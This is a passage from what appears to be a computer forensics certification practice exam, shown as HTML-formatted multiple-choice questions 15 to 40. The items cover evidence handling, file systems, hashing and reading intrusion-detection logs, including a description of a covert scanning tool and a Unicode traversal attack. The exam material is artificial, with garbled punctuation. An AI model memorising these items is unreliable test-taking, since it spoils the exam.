style="font-size: 12px;">D. Approach the websites for evidence</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">15. A(n) _____________________ is one that.s performed by a computer program rather than the attacker</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">manually performing the steps in the attack sequence.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. blackout attack</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. automated attack</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. distributed attack</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. central processing attack</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">16. The offset in a hexadecimal code is:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. The last byte after the colon</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. The 0x at the beginning of the code</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. The 0x at the end of the code</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. The first byte after the colon</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">17. It takes _____________ mismanaged case/s to ruin your professional reputation as a computer forensics</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">examiner?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. by law, three</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. quite a few</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. only one</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. at least two</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">18. With the standard Linux second extended file system (Ext2fs), a file is deleted when the inode internal link</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">count reaches ________.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. 0</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. 10</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. 100</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. 1</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">19. When examining the log files from a Windows IIS Web Server, how often is a new log file created?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. the same log is used at all times</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. a new log file is created everyday</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. a new log file is created each week</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. a new log is created each time the Web Server is started</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">20. Which part of the Windows Registry contains the user.s password file?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. HKEY_LOCAL_MACHINE</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. HKEY_CURRENT_CONFIGURATION</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. HKEY_USER</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. HKEY_CURRENT_USER</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">21. An employee is attempting to wipe out data stored on a couple of compact discs (CDs) and digital video</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">discs (DVDs) by using a large magnet. You inform him that this method will not be effective in wiping out</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">the data because CDs and DVDs are ______________ media used to store large amounts of data and are</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">not affected by the magnet.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. logical</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. anti-magnetic</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. magnetic</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. optical</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">22. Lance wants to place a honeypot on his network. Which of the following would be your recommendations?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Use a system that has a dynamic addressing on the network</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Use a system that is not directlyinteracing with the router</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Use it on a system in an external DMZ in front of the firewall</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. It doesn.t matter as all replies are faked</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">23. What does the acronym POST mean as it relates to a PC?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Primary Operations Short Test</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Power On Self Test</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Pre Operational Situation Test</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Primary Operating System Test</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">24. Paula works as the primary help desk contact for her company.Paula has just received a call from a user</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">reporting that his computer just displayed a Blue Screen of Death screen and he can no longer work.Paula</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">walks over to the user.s computer and sees the Blue Screen of Death screen.The user.s computer is running</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Windows XP, but the Blue Screen looks like a familiar one that Paula had seen on Windows 2000</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">computers periodically. The user said he stepped away from his computer for only 15 minutes and when he</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">got back, the Blue Screen was there.Paula also noticed that the hard drive activity light was flashing,</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">meaning that the computer was processing something.Paula knew this should not be the case since the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">computer should be completely frozen during a Blue Screen. She checks the network IDS live log entries</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">and notices numerous nmap scan alerts.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">What is Paula seeing happen on this computer?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Paula.s network was scanned using Floppyscan</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. There was IRQ conflict in Paula.s PC</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Paula.s network was scanned using Dumpsec</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Tools like Nessus will cause BSOD</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Explanation:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Floppyscan is a dangerous hacking tool which can be used to portscan a system using a floppy disk</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Bootsup mini Linux Displays Blue screen of death screen Port scans the network using NMAP Send the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">results by e-mail to a remote server.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">25. What is the advantage in encrypting the communication between the agent and the monitor in an Intrusion</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Detection System?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Encryption of agent communications will conceal the presence of the agents</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Alerts are sent to the monitor when a potential intrusion is detected</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. An intruder could intercept and delete data or alerts and the intrusion can go undetected</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. The monitor will know if counterfeit messages are being generated because they will not be encrypted</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">26. Which legal document allows law enforcement to search an office, place of business, or other locale for</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">evidence relating to an alleged crime?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. bench warrant</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. wire tap</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. subpoena</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. search warrant</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">27. You are working as an investigator for a corporation and you have just received instructions from your</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">manager to assist in the collection of 15 hard drives that are part of an ongoing investigation. Your job is to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">complete the required evidence custody forms to properly document each piece of evidence as it is</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">collected by other members of your team. Your manager instructs you to complete one multi-evidence form</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">for the entire case and a single-evidence form for each hard drive. How will these forms be stored to help</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">preserve the chain of custody of the case?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. All forms should be placed in an approved secure container because they are now primary evidence in</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">the case.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. The multi-evidence form should be placed in the report file and the single-evidence forms should be</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">kept with each hard drive in an approved secure container.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. The multi-evidence form should be placed in an approved secure container with the hard drives and the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">single-evidence forms should be placed in the report file.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. All forms should be placed in the report file because they are now primary evidence in the case.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">28. The MD5 program is used to:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. wipe magnetic media before recycling it</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. make directories on a evidence disk</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. view graphics files on an evidence drive</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. verify that a disk is not altered when you examine it</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">29. Which is a standard procedure to perform during all computer forensics investigations?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. with the hard drive removed from the suspect PC, check the date and time in the system.s CMOS</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. with the hard drive in the suspect PC, check the date and time in the File Allocation Table</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. with the hard drive removed from the suspect PC, check the date and time in the system.s RAM</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. with the hard drive in the suspect PC, check the date and time in the system.s CMOS</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">30. E-mail logs contain which of the following information to help you in your investigation? (Select up to 4)</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. user account that was used to send the account</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. attachments sent with the e-mail message</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. unique message identifier</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. contents of the e-mail message</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">E. date and time the message was sent</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">31. In a forensic examination of hard drives for digital evidence, what type of user is most likely to have the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">most file slack to analyze?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. one who has NTFS 4 or 5 partitions</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. one who uses dynamic swap file capability</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. one who uses hard disk writes on IRQ 13 and 21</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. one who has lots of allocation units per block or cluster</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">32. In what way do the procedures for dealing with evidence in a criminal case differ from the procedures for</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">dealing with evidence in a civil case?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. evidence must be handled in the same way regardless of the type of case</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. evidence procedures are not important unless you work for a law enforcement agency</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. evidence in a criminal case must be secured more tightly than in a civil case</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. evidence in a civil case must be secured more tightly than in a criminal case</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">33. You are assigned to work in the computer forensics lab of a state police agency. While working on a high</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">profile criminal case, you have followed every applicable procedure, however your boss is still concerned</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">that the defense attorney might question weather evidence has been changed while at the laB. What can</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">you do to prove that the evidence is the same as it was when it first entered the lab?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. make an MD5 hash of the evidence and compare it with the original MD5 hash that was taken when the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">evidence first entered the lab</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. make an MD5 hash of the evidence and compare it to the standard database developed by NIST</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. there is no reason to worry about this possible claim because state labs are certified</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. sign a statement attesting that the evidence is the same as it was when it entered the lab</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">34. Study the log given below and answer the following question:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169 Apr 24 14:46:46 [4663]:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482 Apr 24 18:01:05 [4663]: IDS/DNS-versionquery:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">212.244.97.121:3485 -> 172.16.1.107:53 Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">194.222.156.169:1425 -> 172.16.1.107:21 Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">DETECTED from 24.9.255.53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -></span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">172.16.1.107:53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -></span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">172.16.1.101:53</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111 Apr 25 19:37:32</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">[5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80 Apr 26 05:45:12</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">[6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53 Apr 26 06:43:05 [6283]:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 Apr 26 06:44:25 victim7 PAM_pwdb[12509]:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">(login) session opened for user simple by (uid=0) Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su)</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">session opened for user simon by simple(uid=506)</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080 Apr 26 06:52:10</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">[6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Precautionary measures to prevent this attack would include writing firewall rules. Of these firewall rules,</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">which among the following would be appropriate?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Disallow UDP53 in from outside to DNS server</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Allow UDP53 in from DNS server to outside</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Disallow TCP53 in from secondaries or ISP server to DNS server</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Block all UDP traffic</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">35. When monitoring for both intrusion and security events between multiple computers, it is essential that the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">computers. clocks are synchronizeD. Synchronized time allows an administrator to reconstruct what took</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">place during an attack against multiple computers. Without synchronized time, it is very difficult to</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">determine exactly when specific events took place, and how events interlace. What is the name of the</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">service used to synchronize time among multiple computers?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Universal Time Set</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Network Time Protocol</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. SyncTime Service</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Time-Sync Protocol</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">36. When investigating a potential e-mail crime, what is your first step in the investigation?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. Trace the IP address to its origin</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. Write a report</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. Determine whether a crime was actually committed</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Recover the evidence</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">37. If a suspect computer is located in an area that may have toxic chemicals, you must:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. coordinate with the HAZMAT team</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. determine a way to obtain the suspect computer</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. assume the suspect machine is contaminated</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. do not enter alone</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">38. The following excerpt is taken from a honeypot log. The log captures activities across three days. There are</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">several intrusion attempts; however, a few are successful. (Note: The objective of this question is to test</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">whether the student can read basic information from log entries and interpret the nature of attack.)</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169 Apr 24 14:46:46 [4663]:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482 Apr 24 18:01:05 [4663]: IDS/DNS-versionquery:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">212.244.97.121:3485 -> 172.16.1.107:53 Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">194.222.156.169:1425 -> 172.16.1.107:21 Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">DETECTED from 24.9.255.53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -></span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">172.16.1.107:53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -></span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">172.16.1.101:53 Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80 Apr 26</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53 Apr 26 06:43:05</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 Apr 26 06:44:25 victim7</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">PAM_pwdb[12509]: (login) session opened for user simple by (uid=0) Apr 26 06:44:36 victim7</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080 Apr 26 06:52:10</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">[6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558 From the options given</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">below choose the one which best interprets the following entry:</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. An IDS evasion technique</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. A buffer overflow attempt</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. A DNS zone transfer</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. Data being retrieved from 63.226.81.13</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">39. What happens when a file is deleted by a Microsoft operating system using the FAT file system?</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">A. only the reference to the file is removed from the FAT</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">B. the file is erased and cannot be recovered</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">C. a copy of the file is stored and the original file is erased</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">D. the file is erased but can be recovered</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">40. The following excerpt is taken from a honeypot log that was hosted at laB. wiretrip.net. Snort reported</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 12px;">attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.</span></span><br /> <span style="font-family: arial, Verdana, tahoma, sans-serif;"><span style="font-size: 